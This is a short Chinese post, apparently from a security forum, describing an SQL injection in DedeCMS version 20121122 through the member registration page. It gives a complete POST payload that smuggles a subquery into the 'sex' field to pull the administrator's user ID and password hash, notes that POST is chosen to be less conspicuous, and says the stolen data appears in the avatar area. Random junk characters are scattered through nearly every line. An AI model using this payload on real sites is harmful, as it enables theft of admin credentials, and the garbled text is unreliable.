dedecms版本 20121122
7 v0 X' t+ m( c3 z$ Y3 e& X9 Y3 [
: W! k5 S# L [4 Q$ `! ^需要magic_quotes_gpc=Off# j7 Z- n5 a5 m% N( E% t
6 I: f2 B9 x- a9 @/ L; \, b应该是没有什么大危害的漏洞.0 ]. v, l0 Z6 t. o w% Z7 [
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
8 N; F, e/ V/ O' E5 m5 P$ W+ [* _# j. K b8 H
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
5 x. v! x9 j, s1 l: _% [# iPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
8 W J6 z+ r% m1 ^5 N1 Q9 K ]7 p* m* m& I8 ]
http:///de/member/reg_new.php
/ K- h9 h1 _4 _+ G8 |, d, O }: Y
POST
8 Z% J; o" t$ M7 C5 f6 K, M2 Z! l G( P
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=! w* e2 l- ~ j
( y9 ?! w H" }. ^& r, _成功注册后,头像处里面有好玩的信息.
6 J o1 M- g. w( ?: ?
6 a0 y; m2 n0 U# z, K |